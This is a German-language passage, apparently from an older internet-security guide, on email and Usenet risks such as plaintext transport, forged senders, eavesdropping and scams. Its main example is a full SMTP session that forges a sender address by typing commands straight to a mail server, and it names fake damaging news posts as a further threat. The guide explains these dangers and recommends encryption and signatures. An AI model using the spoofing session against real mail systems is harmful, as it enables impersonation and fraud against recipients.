Gefälschte E-Mail (z. B. bei Bestellungen)

Sowohl die Informationen im Kopf der E-Mail-Nachricht als auch der eigentliche Text werden im Klartext vom Sender zum Empfänger transportiert. Jeder mit ausreichenden Zugriffsrechten auf einem Durchgangs- system könnte die Post mitlesen oder verfälschen. Die einzige befriedigende Lösung besteht darin, zumindest den Text zu chiffrieren.
Ein anderes Sicherheitsproblem von E-Mails besteht in der Möglichkeit, einen Brief zu fälschen. Da in der Regel das “From”-Feld Aufschluss über den Absender gibt, kann nur die Abschätzung der Wahrscheinlichkeit helfen zu beurteilen, ob ein Brief von president@whitehouse.gov tatsächlich vom amerikanischen Präsidenten stammt. Auch in diesem Fall verschafft Verschlüsselung ansatzweise Abhilfe, indem die Briefe mit einer digitalen Signatur versehen werden können.
Ohne weitere Maßnahmen findet bei Mailsystemen keine Überprüfung der Absenderadressen statt. Damit kann diese Angabe beliebig gefälscht werden.

Beispiel: (Ihre Eingaben sind fett)

1und1 online smtp
Trying 192.168.253.250...
Connected to 192.168.253.250.
Escape character is '^]'.
220 victim.goodguys.de ESMTP Sendmail 8.8.8/8.8.8;
 Thu, 14 Oct 1999 15:06:52 +0200
mail from: mich@catwissel.de
250 mich@catwissel.de... Sender ok
rcpt to:deneme
250 deneme... Recipient ok
data
354 Enter mail, end with "." on a line by itself
Betr.: Ihre Anfrage nach Einlass in den Himmel!

Es tut uns leid, aber wir koennen Sie als Mitarbeiter
nicht bei uns aufnehmen und haben Ihre Anfrage an unser Tochter-
unternehmen
www.woanders.org weitergeleitet.

Mit freundlichen Grüßen,
  i. V. Petrus
.
250 PAA00111 Message accepted for delivery
quit
221 victim.goodguys.de closing connection
Connection closed by foreign host.           
 

Gefälschte Newsbeiträge
Auf die gleiche Art und Weise kann sich jemand in den Newsgruppen, den schwarzen Brettern des Internet (genauer des USENET), als Angehöriger Ihres Unter- nehmens ausgeben und durch entsprechende Veröffentlichungen den Ruf der Firma empfindlich schädigen.

Beispiel: Es postet jemand Berichte über das gehäufte Auftreten von Salmonellen bei McDonalds.

Abhören von Daten
Wie schon mehrfach erwähnt, besteht im Internet auch generell die Möglichkeit, Daten auf dem Weg durchs Netz abzuhören oder sie abzufangen und verändert weiterzu- geben. Loginnamen und Passwörter werden oft im Klartext übertragen.

Gaunereien
Kettenbriefe, Schneeballsysteme, Verkauf von Diebesgut, Angebot nicht existierender Waren usw. gibt es natürlich auch im Internet.